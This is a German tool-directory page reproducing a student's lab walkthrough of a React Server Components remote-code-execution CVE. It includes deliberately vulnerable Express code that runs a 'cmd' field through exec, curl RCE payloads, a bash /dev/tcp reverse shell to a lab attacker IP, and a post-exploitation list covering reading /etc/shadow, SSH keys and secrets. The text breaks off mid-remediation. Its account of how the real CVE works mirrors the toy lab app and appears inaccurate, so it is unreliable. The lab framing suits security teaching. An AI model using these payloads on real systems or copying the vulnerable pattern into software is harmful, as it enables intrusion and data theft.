Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-55182-analysis — Sicherheitsforschung & Exploitation-Analyse von CVE-2025-55182 (React) — CVSS + OWASP Top 10 Mapping | Kitploit
Tools/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

Sicherheitsforschung & Exploitation-Analyse von CVE-2025-55182 (React) — CVSS + OWASP Top 10 Mapping

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 — RCE-Analyse von React Server Components

Analyse von Webanwendungssicherheitslücken · M2 Cybersecurity · 2025 Autor: Niane Mohamed · LinkedIn

Ende-zu-Ende-Ausnutzungskette einer kritischen (CVSS 10.0) unsicheren Deserialisierungsschwachstelle in React Server Components, von der Aufklärung bis zur nicht authentifizierten Remote-Codeausführung, mit vollständigem Sanierungsfahrplan.


⚠️ Ethischer Haftungsausschluss

Diese Forschung zielt auf eine absichtlich anfällige Laboranwendung ab, die zur Demonstration des CVE erstellt wurde. Alle Tests fanden in einem isolierten virtuellen Netzwerk ohne Verbindung zu Produktionssystemen, echten Benutzerdaten oder Drittanbieterdiensten statt.

  • Führen Sie diese Techniken NICHT gegen Systeme aus, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Stellen Sie die anfällige Anwendung NICHT in einem internetfähigen Netzwerk bereit.
  • Es gelten die Grundsätze der verantwortungsvollen Offenlegung – melden Sie Erkenntnisse stets über koordinierte Kanäle.

Inhaltsverzeichnis

  1. Zusammenfassung der Schwachstelle
  2. Betroffene Versionen
  3. Laborumgebung
  4. Ausnutzungsdurchlauf
  5. Auswirkungsbewertung
  6. Abhilfe
  7. Nachgewiesene Fähigkeiten

Zusammenfassung der Schwachstelle

FeldWert
CVECVE-2025-55182
KlasseUnsichere Deserialisierung → Remote-Codeausführung
CVSS v3.110.0 (Kritisch) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Authentifizierung erforderlichKeine
Benutzerinteraktion erforderlichKeine
AngriffsvektorNetzwerk (remote)
KomponenteReact Server Components (RSC) Runtime

Wie die Schwachstelle funktioniert

React Server Components führten ein neues Serialisierungsformat ein, um servergerenderte Komponenten an den Client zu streamen. In verwundbaren Versionen akzeptiert der RSC-Endpunkt ein JSON-Payload mit einem cmd-Feld, das unsanitisiert an child_process.exec() übergeben wird – als Teil der serverseitigen Rendering-Auswertung.

Ein Angreifer kann eine manipulierte POST-Anfrage senden, die:

  1. Als legitimes RSC-Payload akzeptiert wird (keine Authentifizierung, kein CSRF)
  2. Während des "Rendering" serverseitige Codeausführung auslöst
  3. Mit den Privilegien des Node.js-Prozesses (oft root in Containern) ausgeführt wird

Betroffene Versionen

KomponenteVerwundbarer BereichBehoben in
react19.0.0 → 19.2.019.3.0+
react-server-dom-webpack19.0.0 → 19.2.019.3.0+
react-server-dom-esm19.0.0 → 19.2.019.3.0+

Laborumgebung

RolleBetriebssystemWerkzeuge
AngreiferKali Linux (neueste Version)nmap, curl, netcat, OWASP ZAP, Firefox
ZielUbuntu 22.04.4Node.js 18, Express, React 19.0 RSC
NetzwerkVMware VMnet Host-OnlyKein Internetzugang

Zielanwendung

Ein minimaler Express + RSC-Server, der einen /rsc-Endpunkt bereitstellt, der unsicher Befehle aus dem eingehenden Payload ausführt – reproduziert das Schwachstellenmuster des echten CVE in kontrollierter Umgebung:

// server.js — simplifiziert, nur für Labor
const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.json({ limit: '2mb' }));

app.post('/rsc', (req, res) => {
  const payload = req.body?.payload;
  if (typeof payload?.cmd === 'string') {
    // VERWUNDBAR: führt angreifergesteuerten String aus
    exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
      if (err) return res.status(500).json({ error: String(err), stderr });
      return res.json({ ok: true, out: stdout });
    });
  }
});

app.listen(3000);

Ausnutzungsdurchlauf

Phase 1 — Aufklärung

# Port-Erkennung
nmap 192.168.159.131
# → 3000/tcp open  ppp  (Node.js RSC server)

# Dienstverifikation
curl -v http://192.168.159.131:3000/
# → HTTP/1.1 200 OK
# → X-Powered-By: Express
# → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."

Der X-Powered-By: Express-Header und der ungewöhnliche Port 3000 liefern einen starken Fingerabdruck, dass es sich um eine Node.js-Anwendung handelt – konsistent mit RSC-Bereitstellungen.

Phase 2 — Bestätigung durch harmlosen Befehl

Bevor zerstörerische Maßnahmen ergriffen werden, wird die Schwachstelle mit einem harmlosen Befehl validiert:

curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "id" } }'

# Antwort:
# {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}

✅ Bestätigt: Nicht authentifizierte RCE als root. Der Server läuft mit uneingeschränkten Privilegien.

Phase 3 — Reverse Shell

Upgrade von Einzelbefehlsausführung auf eine vollständige interaktive Shell:

# Listener auf Angreifermaschine
nc -lvnp 4444

# Payload-Zustellung
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'

Listener empfängt:

connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
root@ns1:~/vulnerable_rsc_app# id
uid=0(root) gid=0(root) groups=0(root)

Phase 4 — Post-Exploitation-Potenzial (demonstriert, nicht ausgeführt)

Mit root auf dem Ziel könnte ein Angreifer trivial:

  • /etc/shadow, SSH-Schlüssel, Anwendungsgeheimnisse, .env-Dateien lesen
  • Persistenz installieren (Cron-Jobs, systemd-Dienste, SSH-Key-Implantate)
  • Seitwärtsbewegung über entdeckte Anmeldedaten
  • Cryptominer oder Ransomware einsetzen
  • Die Node.js-Anwendung ändern, um Benutzerdaten still zu erfassen

Auswirkungsbewertung

Geschäftliche Auswirkungen (fiktives Zielscenario)

AchseAuswirkungErklärung
VertraulichkeitKritischVollständiger Lesezugriff auf alle Serverdaten
IntegritätKritischFähigkeit, Anwendungscode und Benutzerdaten zu ändern
VerfügbarkeitHochAngreifer kann den Dienst beenden oder Lösegeld fordern
RegulatorischSchwerwiegendDSGVO-Verstoß mit 72h-Meldepflicht · mögliche 4% des weltweiten Umsatzes als Geldbuße
RufSchwerwiegendÖffentlicher CVE-gemapte Sicherheitsvorfall schädigt Kundenvertrauen
FinanziellHochIncident Response, behördliche Geldbußen, mögliche Sammelklagen

Bedrohungsakteurprofil

Die geringe Komplexität dieses Angriffs – keine Authentifizierung, keine Benutzerinteraktion, einzelne HTTP-Anfrage – macht ihn attraktiv für:

  • Opportunistische Scanner (Botnets, die automatisch nach dem CVE scannen)
  • Initial Access Broker, die Zugänge an Ransomware-Gruppen verkaufen
  • Staatliche Akteure, die Organisationen mit React-Server-Rendering ins Visier nehmen

Abhilfe

Sofort (innerhalb von 24 Stunden)

  1. React auf 19.3.0+ upgraden – gepatchte Version

    npm update react react-server-dom-webpack react-server-dom-esm
    
  2. Temporäre WAF-Regel (falls Upgrade verzögert):

    Blockiere POST-Anfragen an /rsc mit JSON-Body, der "cmd"-Feld enthält
    
  3. Notfallreaktion auf Vorfälle:

    • Server-Zugriffslogs der letzten 90 Tage prüfen
    • Nach ungewöhnlichem /rsc-POST-Verkehr suchen
    • Alle vom Server zugänglichen Geheimnisse rotieren
    • Ein Snapshot des betroffenen Systems für Forensik vor der Abhilfe erstellen

Kurzfristig (innerhalb von 2 Wochen)

Tool herunterladen